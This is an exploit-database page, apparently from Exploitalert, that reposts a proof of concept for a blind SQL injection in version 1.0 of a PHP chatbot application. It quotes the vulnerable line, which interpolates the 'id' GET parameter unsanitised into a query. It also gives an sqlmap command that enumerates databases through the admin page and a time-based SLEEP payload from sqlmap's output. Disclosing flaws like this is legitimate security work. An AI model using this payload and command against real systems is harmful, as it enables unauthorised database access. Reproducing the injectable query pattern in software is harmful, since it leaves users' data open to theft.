Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

ChatBot Application With A Suggestion Feature 1.0 SQL Injection
# Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection
# Date: 05/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Linux

# Vulnerable Code

line 4 in file "/simple_chat_bot/admin/responses/view_response.php"

$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");

# Sqlmap command:

sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.